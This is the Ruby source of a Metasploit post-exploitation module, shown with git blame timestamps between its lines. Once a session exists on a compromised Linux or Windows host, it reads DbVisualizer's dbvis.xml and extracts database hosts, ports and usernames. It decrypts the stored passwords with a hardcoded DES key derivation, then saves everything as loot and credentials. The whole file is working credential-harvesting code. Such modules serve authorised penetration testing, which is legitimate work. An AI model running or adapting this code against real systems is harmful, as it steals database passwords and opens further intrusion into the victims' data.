2014-07-14 18:08:48 +00:00
|
|
|
##
|
2017-07-24 13:26:21 +00:00
|
|
|
# This module requires Metasploit: https://metasploit.com/download
|
2014-07-14 18:08:48 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core/auxiliary/report'
|
2015-05-28 05:21:00 +00:00
|
|
|
require 'openssl'
|
|
|
|
require 'digest/md5'
|
2014-07-14 18:08:48 +00:00
|
|
|
|
2016-03-08 13:02:44 +00:00
|
|
|
class MetasploitModule < Msf::Post
|
2014-07-14 18:08:48 +00:00
|
|
|
include Msf::Post::File
|
|
|
|
include Msf::Post::Unix
|
|
|
|
include Msf::Auxiliary::Report
|
|
|
|
|
|
|
|
def initialize(info={})
|
|
|
|
super( update_info( info,
|
2014-07-21 17:35:01 +00:00
|
|
|
'Name' => 'Multi Gather DbVisualizer Connections Settings',
|
2014-07-14 18:08:48 +00:00
|
|
|
'Description' => %q{
|
|
|
|
DbVisualizer stores the user database configuration in dbvis.xml.
|
2015-05-28 05:21:00 +00:00
|
|
|
This module retrieves the connections settings from this file and decrypts the encrypted passwords.
|
2014-07-14 18:08:48 +00:00
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
2014-07-14 19:57:36 +00:00
|
|
|
'Author' => [ 'David Bloom' ], # Twitter: @philophobia78
|
2014-07-14 18:08:48 +00:00
|
|
|
'Platform' => %w{ linux win },
|
|
|
|
'SessionTypes' => [ 'meterpreter', 'shell']
|
|
|
|
))
|
2015-05-28 05:58:36 +00:00
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
OptString.new('PASSPHRASE', [false, 'The hardcoded passphrase used for encryption']),
|
|
|
|
OptInt.new('ITERATION_COUNT', [false, 'The iteration count used in key derivation', 10])
|
|
|
|
], super.class)
|
2014-07-14 18:08:48 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def run
|
|
|
|
|
2014-07-15 16:31:37 +00:00
|
|
|
oldversion = false
|
2014-07-14 18:08:48 +00:00
|
|
|
|
|
|
|
case session.platform
|
2016-10-31 15:35:01 +00:00
|
|
|
when 'linux'
|
2015-05-28 05:21:00 +00:00
|
|
|
user = session.shell_command('whoami').chomp
|
2014-07-14 18:08:48 +00:00
|
|
|
print_status("Current user is #{user}")
|
2015-05-28 05:21:00 +00:00
|
|
|
if user =~ /root/
|
2014-07-14 19:39:34 +00:00
|
|
|
user_base = "/root/"
|
2014-07-14 18:08:48 +00:00
|
|
|
else
|
2014-07-15 16:31:37 +00:00
|
|
|
user_base = "/home/#{user}/"
|
2014-07-14 18:08:48 +00:00
|
|
|
end
|
|
|
|
dbvis_file = "#{user_base}.dbvis/config70/dbvis.xml"
|
2016-10-31 15:35:01 +00:00
|
|
|
when 'windows'
|
|
|
|
if session.type == 'meterpreter'
|
2014-07-14 18:08:48 +00:00
|
|
|
user_profile = session.sys.config.getenv('USERPROFILE')
|
|
|
|
else
|
|
|
|
user_profile = cmd_exec("echo %USERPROFILE%").strip
|
|
|
|
end
|
|
|
|
dbvis_file = user_profile + "\\.dbvis\\config70\\dbvis.xml"
|
|
|
|
end
|
|
|
|
|
2014-07-14 20:24:53 +00:00
|
|
|
unless file?(dbvis_file)
|
2014-07-15 16:31:37 +00:00
|
|
|
# File not found, we next try with the old config path
|
2014-07-15 10:14:38 +00:00
|
|
|
print_status("File not found: #{dbvis_file}")
|
2015-05-28 05:21:00 +00:00
|
|
|
print_status('This could be an older version of dbvis, trying old path')
|
2014-07-15 10:33:07 +00:00
|
|
|
case session.platform
|
2016-10-31 21:35:36 +00:00
|
|
|
when 'linux'
|
2014-07-15 16:31:37 +00:00
|
|
|
dbvis_file = "#{user_base}.dbvis/config/dbvis.xml"
|
2016-10-31 21:35:36 +00:00
|
|
|
when 'windows'
|
2014-07-15 16:31:37 +00:00
|
|
|
dbvis_file = user_profile + "\\.dbvis\\config\\dbvis.xml"
|
2014-07-15 10:14:38 +00:00
|
|
|
end
|
|
|
|
unless file?(dbvis_file)
|
|
|
|
print_error("File not found: #{dbvis_file}")
|
|
|
|
return
|
|
|
|
end
|
2014-07-15 16:31:37 +00:00
|
|
|
oldversion = true
|
2014-07-14 20:01:03 +00:00
|
|
|
end
|
2014-07-14 19:39:34 +00:00
|
|
|
|
2014-07-15 16:31:37 +00:00
|
|
|
print_status("Reading: #{dbvis_file}")
|
|
|
|
print_line()
|
2014-07-14 20:27:40 +00:00
|
|
|
raw_xml = ""
|
|
|
|
begin
|
|
|
|
raw_xml = read_file(dbvis_file)
|
|
|
|
rescue EOFError
|
|
|
|
# If there's nothing in the file, we hit EOFError
|
|
|
|
print_error("Nothing read from file: #{dbvis_file}, file may be empty")
|
|
|
|
return
|
|
|
|
end
|
2014-07-15 16:31:37 +00:00
|
|
|
|
2014-07-15 12:00:29 +00:00
|
|
|
if oldversion
|
|
|
|
# Parse old config file
|
2014-12-12 12:16:21 +00:00
|
|
|
db_table = parse_old_config_file(raw_xml)
|
2014-07-15 12:00:29 +00:00
|
|
|
else
|
|
|
|
# Parse new config file
|
2014-12-12 12:16:21 +00:00
|
|
|
db_table = parse_new_config_file(raw_xml)
|
2014-07-15 12:00:29 +00:00
|
|
|
end
|
2014-07-14 20:27:40 +00:00
|
|
|
|
2014-07-15 12:00:29 +00:00
|
|
|
if db_table.rows.empty?
|
2015-05-28 05:21:00 +00:00
|
|
|
print_status('No database settings found')
|
2014-07-15 12:00:29 +00:00
|
|
|
else
|
2015-05-28 05:21:00 +00:00
|
|
|
print_line
|
2014-07-15 12:00:29 +00:00
|
|
|
print_line(db_table.to_s)
|
2015-05-28 05:21:00 +00:00
|
|
|
print_good('Try to query listed databases with dbviscmd.sh (or .bat) -connection <alias> -sql <statements> and have fun!')
|
2014-07-15 13:04:46 +00:00
|
|
|
print_line()
|
2015-05-28 05:21:00 +00:00
|
|
|
# Store found databases in loot
|
|
|
|
p = store_loot('dbvis.databases', 'text/csv', session, db_table.to_csv, 'dbvis_databases.txt', 'dbvis databases')
|
2014-07-15 12:00:29 +00:00
|
|
|
print_good("Databases settings stored in: #{p.to_s}")
|
|
|
|
end
|
|
|
|
|
|
|
|
print_status("Downloading #{dbvis_file}")
|
|
|
|
p = store_loot("dbvis.xml", "text/xml", session, read_file(dbvis_file), "#{dbvis_file}", "dbvis config")
|
|
|
|
print_good "dbvis.xml saved to #{p.to_s}"
|
|
|
|
end
|
|
|
|
|
|
|
|
# New config file parse function
|
2014-12-12 12:16:21 +00:00
|
|
|
def parse_new_config_file(raw_xml)
|
2014-07-15 12:00:29 +00:00
|
|
|
|
2016-08-10 18:30:09 +00:00
|
|
|
db_table = Rex::Text::Table.new(
|
2015-05-28 05:21:00 +00:00
|
|
|
'Header' => "DbVisualizer Databases",
|
2014-07-15 12:00:29 +00:00
|
|
|
'Indent' => 2,
|
|
|
|
'Columns' =>
|
|
|
|
[
|
|
|
|
"Alias",
|
|
|
|
"Type",
|
|
|
|
"Server",
|
|
|
|
"Port",
|
|
|
|
"Database",
|
|
|
|
"Namespace",
|
2015-05-29 06:08:24 +00:00
|
|
|
"UserID",
|
2015-05-28 05:21:00 +00:00
|
|
|
"Password"
|
2014-07-15 12:00:29 +00:00
|
|
|
])
|
2014-07-15 16:31:37 +00:00
|
|
|
|
2014-07-15 12:00:29 +00:00
|
|
|
dbs = []
|
|
|
|
db = {}
|
|
|
|
dbfound = false
|
2015-05-28 05:21:00 +00:00
|
|
|
version_found = false
|
2014-07-15 12:00:29 +00:00
|
|
|
# fetch config file
|
2014-07-14 20:27:40 +00:00
|
|
|
raw_xml.each_line do |line|
|
2014-07-15 13:04:46 +00:00
|
|
|
|
2015-05-28 05:21:00 +00:00
|
|
|
if version_found == false
|
|
|
|
version_found = find_version(line)
|
2014-07-15 13:04:46 +00:00
|
|
|
end
|
|
|
|
|
2014-07-14 19:39:34 +00:00
|
|
|
if line =~ /<Database id=/
|
|
|
|
dbfound = true
|
|
|
|
elsif line =~ /<\/Database>/
|
2014-07-15 16:31:37 +00:00
|
|
|
dbfound = false
|
2014-07-14 19:39:34 +00:00
|
|
|
if db[:Database].nil?
|
|
|
|
db[:Database] = "";
|
|
|
|
end
|
|
|
|
if db[:Namespace].nil?
|
|
|
|
db[:Namespace] = "";
|
|
|
|
end
|
|
|
|
# save
|
2015-06-02 09:16:16 +00:00
|
|
|
dbs << db if (db[:Alias] and db[:Type] and db[:Server] and db[:Port])
|
2014-07-14 19:39:34 +00:00
|
|
|
db = {}
|
|
|
|
end
|
2014-07-14 18:08:48 +00:00
|
|
|
|
2014-07-14 19:53:27 +00:00
|
|
|
if dbfound == true
|
2014-07-14 19:39:34 +00:00
|
|
|
# get the alias
|
2015-05-28 05:21:00 +00:00
|
|
|
if line =~ /<Alias>([\S+\s+]+)<\/Alias>/i
|
2014-07-14 19:39:34 +00:00
|
|
|
db[:Alias] = $1
|
|
|
|
end
|
|
|
|
|
|
|
|
# get the type
|
2015-05-28 05:21:00 +00:00
|
|
|
if line =~ /<Type>([\S+\s+]+)<\/Type>/i
|
2015-06-02 09:18:36 +00:00
|
|
|
db[:Type] = $1
|
2014-07-14 19:39:34 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
# get the user
|
2015-05-28 05:21:00 +00:00
|
|
|
if line =~ /<Userid>([\S+\s+]+)<\/Userid>/i
|
2015-05-29 06:08:24 +00:00
|
|
|
db[:UserID] = $1
|
2014-07-14 19:39:34 +00:00
|
|
|
end
|
|
|
|
|
2015-05-28 05:21:00 +00:00
|
|
|
# get user password
|
|
|
|
if line =~ /<Password>([\S+\s+]+)<\/Password>/i
|
|
|
|
enc_password = $1
|
|
|
|
db[:Password] = decrypt_password(enc_password)
|
|
|
|
end
|
|
|
|
|
2014-07-14 19:39:34 +00:00
|
|
|
# get the server
|
2015-05-28 05:21:00 +00:00
|
|
|
if line =~ /<UrlVariable UrlVariableName="Server">([\S+\s+]+)<\/UrlVariable>/i
|
2014-07-14 19:39:34 +00:00
|
|
|
db[:Server] = $1
|
|
|
|
end
|
|
|
|
|
|
|
|
# get the port
|
2015-05-28 05:21:00 +00:00
|
|
|
if line =~ /<UrlVariable UrlVariableName="Port">([\S+\s+]+)<\/UrlVariable>/i
|
2014-07-14 19:39:34 +00:00
|
|
|
db[:Port] = $1
|
|
|
|
end
|
|
|
|
|
|
|
|
# get the database
|
2015-05-28 05:21:00 +00:00
|
|
|
if line =~ /<UrlVariable UrlVariableName="Database">([\S+\s+]+)<\/UrlVariable>/i
|
2014-07-14 19:39:34 +00:00
|
|
|
db[:Database] = $1
|
|
|
|
end
|
|
|
|
|
|
|
|
# get the Namespace
|
2015-05-28 05:21:00 +00:00
|
|
|
if line =~ /<UrlVariable UrlVariableName="Namespace">([\S+\s+]+)<\/UrlVariable>/i
|
2014-07-14 19:39:34 +00:00
|
|
|
db[:Namespace] = $1
|
|
|
|
end
|
2014-07-14 18:08:48 +00:00
|
|
|
end
|
|
|
|
end
|
2014-07-14 19:39:34 +00:00
|
|
|
|
2014-07-15 16:31:37 +00:00
|
|
|
# Fill the tab and report eligible servers
|
2014-07-14 20:14:54 +00:00
|
|
|
dbs.each do |db|
|
|
|
|
if ::Rex::Socket.is_ipv4?(db[:Server].to_s)
|
2015-05-28 05:21:00 +00:00
|
|
|
print_good("Reporting #{db[:Server]}")
|
2014-07-14 20:14:54 +00:00
|
|
|
report_host(:host => db[:Server]);
|
|
|
|
end
|
2014-07-14 18:08:48 +00:00
|
|
|
|
2015-05-29 06:08:24 +00:00
|
|
|
db_table << [ db[:Alias], db[:Type], db[:Server], db[:Port], db[:Database], db[:Namespace], db[:UserID], db[:Password] ]
|
2015-06-02 09:16:16 +00:00
|
|
|
report_cred(
|
|
|
|
ip: db[:Server],
|
|
|
|
port: db[:Port].to_i,
|
|
|
|
service_name: db[:Type],
|
|
|
|
username: db[:UserID],
|
|
|
|
password: db[:Password]
|
|
|
|
)
|
2014-07-14 20:14:54 +00:00
|
|
|
end
|
2014-07-15 12:00:29 +00:00
|
|
|
return db_table
|
|
|
|
end
|
2014-07-14 18:08:48 +00:00
|
|
|
|
2014-07-15 12:21:09 +00:00
|
|
|
# New config file parse function
|
2014-12-12 12:16:21 +00:00
|
|
|
def parse_old_config_file(raw_xml)
|
2014-07-15 12:00:29 +00:00
|
|
|
|
2016-08-10 18:30:09 +00:00
|
|
|
db_table = Rex::Text::Table.new(
|
2015-05-28 05:21:00 +00:00
|
|
|
'Header' => 'DbVisualizer Databases',
|
2014-07-15 12:00:29 +00:00
|
|
|
'Indent' => 2,
|
|
|
|
'Columns' =>
|
|
|
|
[
|
2015-05-28 05:21:00 +00:00
|
|
|
'Alias',
|
|
|
|
'Type',
|
|
|
|
'URL',
|
|
|
|
'UserID',
|
|
|
|
'Password'
|
2014-07-15 12:00:29 +00:00
|
|
|
])
|
2014-07-15 16:31:37 +00:00
|
|
|
|
2014-07-15 12:00:29 +00:00
|
|
|
dbs = []
|
|
|
|
db = {}
|
|
|
|
dbfound = false
|
2015-05-28 05:21:00 +00:00
|
|
|
version_found = false
|
2014-07-15 12:00:29 +00:00
|
|
|
|
|
|
|
# fetch config file
|
|
|
|
raw_xml.each_line do |line|
|
2014-07-15 13:04:46 +00:00
|
|
|
|
2015-05-28 05:21:00 +00:00
|
|
|
if version_found == false
|
|
|
|
vesrion_found = find_version(line)
|
2014-07-15 13:04:46 +00:00
|
|
|
end
|
|
|
|
|
2014-07-15 12:00:29 +00:00
|
|
|
if line =~ /<Database id=/
|
|
|
|
dbfound = true
|
|
|
|
elsif line =~ /<\/Database>/
|
2014-07-15 16:31:37 +00:00
|
|
|
dbfound = false
|
2014-07-15 12:00:29 +00:00
|
|
|
# save
|
|
|
|
dbs << db if (db[:Alias] and db[:Url] )
|
|
|
|
db = {}
|
|
|
|
end
|
|
|
|
|
|
|
|
if dbfound == true
|
|
|
|
# get the alias
|
2015-05-28 05:21:00 +00:00
|
|
|
if line =~ /<Alias>([\S+\s+]+)<\/Alias>/i
|
2014-07-15 12:00:29 +00:00
|
|
|
db[:Alias] = $1
|
|
|
|
end
|
|
|
|
|
|
|
|
# get the type
|
2015-05-28 05:21:00 +00:00
|
|
|
if line =~ /<Type>([\S+\s+]+)<\/Type>/i
|
2014-07-15 12:00:29 +00:00
|
|
|
db[:Type] = $1
|
|
|
|
end
|
|
|
|
|
|
|
|
# get the user
|
2015-05-28 05:21:00 +00:00
|
|
|
if line =~ /<Userid>([\S+\s+]+)<\/Userid>/i
|
2015-05-29 06:08:24 +00:00
|
|
|
db[:UserID] = $1
|
2014-07-15 12:00:29 +00:00
|
|
|
end
|
|
|
|
|
2015-05-28 05:21:00 +00:00
|
|
|
#get the user password
|
|
|
|
if line =~ /<Password>([\S+\s+]+)<\/Password>/i
|
|
|
|
enc_password = $1
|
|
|
|
db[:Password] = decrypt_password(enc_password)
|
|
|
|
end
|
|
|
|
|
|
|
|
# get the server URL
|
|
|
|
if line =~ /<Url>(\S+)<\/Url>/i
|
2015-05-29 06:08:24 +00:00
|
|
|
db[:URL] = $1
|
2014-07-15 12:00:29 +00:00
|
|
|
end
|
2015-05-28 05:21:00 +00:00
|
|
|
|
2014-07-15 12:00:29 +00:00
|
|
|
end
|
2014-07-14 20:14:54 +00:00
|
|
|
end
|
2014-07-14 18:08:48 +00:00
|
|
|
|
2014-07-15 12:00:29 +00:00
|
|
|
# Fill the tab
|
|
|
|
dbs.each do |db|
|
2015-05-29 06:08:24 +00:00
|
|
|
if (db[:URL] =~ /[\S+\s+]+[\/]+([\S+\s+]+):[\S+]+/i)
|
2015-06-02 09:16:16 +00:00
|
|
|
server = $1
|
|
|
|
if ::Rex::Socket.is_ipv4?(server)
|
|
|
|
print_good("Reporting #{server}")
|
|
|
|
report_host(:host => server)
|
2014-07-15 16:31:37 +00:00
|
|
|
end
|
2014-07-15 12:21:09 +00:00
|
|
|
end
|
2015-05-29 06:08:24 +00:00
|
|
|
db_table << [ db[:Alias] , db[:Type] , db[:URL], db[:UserID], db[:Password] ]
|
2015-06-02 09:16:16 +00:00
|
|
|
report_cred(
|
|
|
|
ip: server,
|
|
|
|
port: '',
|
|
|
|
service_name: db[:Type],
|
|
|
|
username: db[:UserID],
|
|
|
|
password: db[:Password]
|
|
|
|
)
|
2014-07-15 12:00:29 +00:00
|
|
|
end
|
|
|
|
return db_table
|
2014-07-14 20:17:54 +00:00
|
|
|
end
|
2014-07-15 12:00:29 +00:00
|
|
|
|
2014-12-12 12:16:21 +00:00
|
|
|
def find_version(tag)
|
2014-07-15 16:31:37 +00:00
|
|
|
found = false
|
2015-05-28 05:21:00 +00:00
|
|
|
if tag =~ /<Version>([\S+\s+]+)<\/Version>/i
|
2014-07-15 16:31:37 +00:00
|
|
|
found = true
|
2015-05-28 05:21:00 +00:00
|
|
|
print_good("DbVisualizer version: #{$1}")
|
|
|
|
end
|
|
|
|
found
|
|
|
|
end
|
|
|
|
|
2015-06-02 09:16:16 +00:00
|
|
|
def report_cred(opts)
|
|
|
|
service_data = {
|
|
|
|
address: opts[:ip],
|
|
|
|
port: opts[:port],
|
|
|
|
service_name: opts[:service_name],
|
|
|
|
protocol: 'tcp',
|
|
|
|
workspace_id: myworkspace_id
|
|
|
|
}
|
|
|
|
|
|
|
|
credential_data = {
|
|
|
|
post_reference_name: self.refname,
|
|
|
|
session_id: session_db_id,
|
|
|
|
origin_type: :session,
|
|
|
|
private_data: opts[:password],
|
|
|
|
private_type: :password,
|
|
|
|
username: opts[:username]
|
|
|
|
}.merge(service_data)
|
|
|
|
|
|
|
|
login_data = {
|
|
|
|
core: create_credential(credential_data),
|
|
|
|
status: Metasploit::Model::Login::Status::UNTRIED,
|
|
|
|
}.merge(service_data)
|
|
|
|
|
|
|
|
create_credential_login(login_data)
|
|
|
|
end
|
|
|
|
|
2015-05-28 05:21:00 +00:00
|
|
|
def decrypt_password(enc_password)
|
|
|
|
enc_password = Rex::Text.decode_base64(enc_password)
|
|
|
|
dk, iv = get_derived_key
|
|
|
|
des = OpenSSL::Cipher.new('DES-CBC')
|
2015-05-29 05:33:55 +00:00
|
|
|
des.decrypt
|
2015-05-28 05:21:00 +00:00
|
|
|
des.key = dk
|
|
|
|
des.iv = iv
|
2015-05-29 05:33:55 +00:00
|
|
|
password = des.update(enc_password) + des.final
|
2015-05-28 05:21:00 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def get_derived_key
|
|
|
|
key = passphrase + salt
|
|
|
|
iteration_count.times do
|
|
|
|
key = Digest::MD5.digest(key)
|
2014-07-15 16:31:37 +00:00
|
|
|
end
|
2015-05-28 05:21:00 +00:00
|
|
|
return key[0,8], key[8,8]
|
|
|
|
end
|
|
|
|
|
|
|
|
def salt
|
|
|
|
[-114,18,57,-100,7,114,111,90].pack('C*')
|
|
|
|
end
|
|
|
|
|
|
|
|
def passphrase
|
2015-05-28 05:58:36 +00:00
|
|
|
datastore['PASSPHRASE'] || 'qinda'
|
2015-05-28 05:21:00 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def iteration_count
|
2015-05-28 05:58:36 +00:00
|
|
|
datastore['ITERATION_COUNT'] || 10
|
2014-07-15 13:04:46 +00:00
|
|
|
end
|
2014-07-14 18:08:48 +00:00
|
|
|
end
|